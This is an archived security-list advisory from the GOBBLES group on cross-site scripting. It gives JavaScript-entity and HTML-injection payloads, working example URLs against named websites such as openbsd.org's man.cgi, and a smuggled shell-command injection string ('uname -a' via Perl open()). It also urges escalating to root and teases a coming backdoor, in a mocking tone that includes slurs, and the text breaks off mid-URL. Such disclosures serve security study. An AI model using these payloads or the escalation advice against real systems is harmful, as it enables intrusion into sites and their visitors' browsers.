What follows is GOBBLES advisory #33. The original version was inappropriate for the list (http://online.securityfocus.com/popups/forums/bugtraq/faq.shtml#0.1.3). With the permission of GOBBLES, an edited advisory is now being sent out. The original, unedited version is located at: http://www.bugtraq.org/advisories/GOBBLES-33.txt --- Hi, We saw the Administrivia post today, so we decided to send this in. Hopefully it's not too late. The post mentioned that new forms of cross-site scripting attacks would be accepted. Well, as you'll see, we have some nifty tricks that are discussed, and also some major products are totally torn apart. Most of the sites allow you to download their custom scripts (e.g. man.cgi) so we believe we are justified in giving examples of sites that are affected, especially since this has been the norm on the security lists for a while now. Thanks to all the administrators who were good sports over this. GOBBLES SECURITY http://www.bugtraq.org/ GOBBLESat_private GOBBLES SECURITY ADVISORY #33 Compass, Square, and Slide-rule New Generation CSS ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ############################################################################ # # # CROSS-SITE SCRIPTING VULNERABILITIES IN PROMINENT WEBSITES AND PRODUCTS # # # # # ############################################################################ ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! I'm over it You see I'm falling in the fast abyss Clouded by memories of the past At last I see I hear it fading, I can't speak it Oh yes you will dig my grave You feeling, finding, always whining Take my hand now be alive You see I cannot be forsaken Because I'm not the only one We walk amongst you feeding, raping Must we hide from everyone? Before we begin, we'd like to mention that recently we've been overwhelmed with emails from journalists asking us questions about our security group. GOBBLES like this very much because it is sign of his crew becoming very famous and ubiquitous. We be accused of seeking fame and job offers. To this GOBBLES say no, we not after job offers, but yes, we after as much fame and attention as possible and this is why we will be disclosing more serious remote vulnerabilities in OS like Solaris and IRIX in near future. Remote exploit for IRIX can then be complemented with upcoming GOBBLES IRIX backdoor. Current misinterpretation about what GOBBLES mean when he say he group seeking worldwide fame, mostly stem from belief that GOBBLES is supporter of non-disclosure and is being sarcastic. This is wrong, disclosure of rpc.rwalld hole show GOBBLES not supporter of non-disclosure and current development project 'lestat' for another default RPC service in Solaris is leading to further proof that GOBBLES is avid supporter of full-disclosure, especially because it great way to annoy as many Fascists, Communists, and McCarthys as possible ;PPPPPPPPPPP. But GOBBLES primary motivation is becoming as famous as possible. We now co-existing with Bugtraq, making the peace, being ethical, etc. BACKGROUND ========== Been a lot of fanfare about cross-site scripting in recent times. Person suggest changing acronym from CSS to XSS so it different from Cascading Style Sheets, but this not really good move because XSS conflict with XML Security Suite from IBM (they company who make computer systems, probably not big fans of stem cell research HEHEHEHEHEHEHEHE). When GOBBLES Security first dreamed of the CSS technique, pioneered it, refined it, and perfected it, we knew of the dastardly tool of mass destruction that had just materialized. Here was something that could make Joe Average a security expert, something that could be wielded by the little guy to sting and subdue the domineering commercial bullies. A well-planted CSS attack can undermine the reputation of even the most stringent corporations, thus making it one of the most effective political tools known in cyberspace. It truly is the Queen's Gambit, the Power Set, the Homology Group, and the Achilles Heel of the infosec world. INNOVATIVE CSS TECHNIQUES ========================= * JavaScript entities - --------------------- Only hotmail security historians like those at GOBBLES Security know of obscure feature in JavaScript language that make it easy to bypass thing like "<...>", "<script>...</script>", and "javascript:" filter for CSS attack using JavaScript. That is thing called JavaScript entity. Like... &{alert('GOBBLES')}; When url-encoded become... %26%7balert%28%27GOBBLES%27%29%7d%3b The beauty of this technique for the adorned CSS exploiter is that the GOBBLES CSS JavaScript Entity can appear almost anywhere with good results. Note that "CERT" page below make no mention of this at all and even say that ampersand is not relied upon by current exploits. Well, now it is. http://www.cert.org/tech_tips/malicious_code_mitigation.html For reference, HTML4 specification only require you to encode the following: ; %3b / %2f ? %3f : %3a @ %40 = %3d & %26 < %3c > %3e " %22 # %23 % %25 { %7b } %7d | %7c \ %5c ^ %5e ~ %7e [ %5b ] %5d ` %60 Until now, that encoding information was private knowledge of the underground. GOBBLES is about information dissemination and believe information wants to be free, though. So really GOBBLES see no need why he should have to justify the disclosure of the encoding techniques. If GOBBLES didn't do it, someone would have, and it best this come from a whitehat retard than from someone making the big dollar. Sometimes in URLs below we can't encode parameter, but this no problem for GOBBLES because smart thing to do is just not enter the character encoded, i.e. enter it literally with no %XX, e.g. '>' gets entered as '>', i.e. '>' does not get entered as '%3e'. Why? Because sometimes in URLs below we can't encode parameter. * HTML string completion / HTML closure - --------------------------------------- Principles are basically identical to SQL injection technique. Doesn't need much coverage since it pretty obvious to anyone with rational mind. GOBBLES will let "CERT" write a dissertation on it. Essentially... *** HTML string completion: <a href="[...]$user_provided"> Make $user_provided: " attribute="malicious_data Then original text becomes <a href="[...]" attribute="malicious data"> Good to make 'attribute' event handlers like onMouseOver, onLoad, onClick, etc. But can just use common attribute like 'id' and just insert GOBBLES CSS JavaScript Entity. *** HTML closure: <a href="[...]$user_provided"> Make $user_provided: "> <tag attribute="malicious data"> Then original text becomes <a href="[...]"> <tag attribute="malicious data">"> Good way to introduce <script> tag, etc. Or GOBBLES CSS JavaScript Entity can be inserted. Again, these two are blatantly obvious and probably have many appearance on the Vuln-Dev already. GOBBLES CSS JavaScript Entity Technique make them almost obsolete. THE VULNERABILITIES =================== 1. openbsd.org / man.cgi - ------------------------ You can get source code like so: http://www.openbsd.org/cgi-bin/man.cgi/source Should be noted that up until a few months ago, '/usr/include' processing was vulnerable to simple PERL open() attack. sub include_output { local($inc) = @_; &http_header("text/plain"); open(I, "$inc") || do { print "open $inc: $!\n"; exit(1) }; while(<I>) { print } close(I); } So you could do like... http://www.openbsd.org/cgi-bin/man.cgi/usr/include;IFS=G;unameG-a;| ... work your way up to local access and core the box with your Solaris locals. Then they try thing like -T taint switch, removing /bin/sh, etc. but futile attempt since existence of GOBBLESpserver-ex.c that will be disclosed soon (hehehe, Theo, I HATE YOU!). We mention this in case other people using version of man.cgi from their site from a while ago. OK, for CSS hole, just a simple matter of linking to... http://www.openbsd.org/cgi-bin/man.cgi?query=%26%7balert%28%27GOBBLES%27%29%7d %3b&apropos=hehehe Examine HTML source to see how GOBBLES CSS JavaScript Entity Technique bypasses the most anal filtering, even when "javascript:..." not always appropriate and automatic JavaScript event handlers don't apply. <INPUT VALUE="&{alert('GOBBLES')};" NAME="query"> Shouldn't be too hard to think of how malicious website owner can use this for CSS attacks against visitor web browser that implicitly trusts openbsd.org -- and who wouldn't since it the cornerstone of security? 2. happyhacker.org / thttpd webserver proper / thttpd ssi program - ----------------------------------------------------------------- The default 404 handling of the thttpd webserver is vulnerable to CSS attacks. All you have to do is.... http://thttpd-site/